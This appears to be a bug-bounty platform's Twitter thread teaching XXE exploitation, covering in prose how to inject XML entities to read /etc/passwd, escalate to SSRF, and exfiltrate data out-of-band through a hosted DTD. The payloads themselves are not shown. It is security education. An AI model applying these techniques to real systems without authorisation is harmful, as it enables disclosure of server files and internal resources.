XXE exploitation ποΈ
Today, we will cover how you can successfully exploit XXE vulnerabilities
If you aren't familiar with the concepts of XXE yet...
This thread is made just for you! ποΈ
1β£ Basic exploitation via XML Entities
Let's start off with the most basic example
A web app that queries the backend to retrieve your previously sent messages
To test if this feature is vulnerable to XXE, we could try and retrieve a local file
To do so, we'd have to add the XML entity definition ourselves:
Afterwards, include your entity in the field and send the request
The response should contain the contents of the local file "/etc/passwd"
But we can also take the same approach to request an internal or external resource and escalate this into an SSRF vulnerability!
2β£ Exploitation via OOB technique
This exploitation technique involves us hosting a DTD file and referencing it in our payload
The XML parser will then parse our malicious XML data and retrieve the external DTD
That DTD file contains our payload
And just as before, we can send our request and retrieve the contents of a local file for example!
We hope you've learned something new from this thread on XXE exploitation:
If you have enjoyed this thread:
1. Follow us @INTIGRITI for more of these threads ποΈ
2. Retweet the first Tweet to share it with your friends ποΈ
Share this Scrolly Tale with your friends.
A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.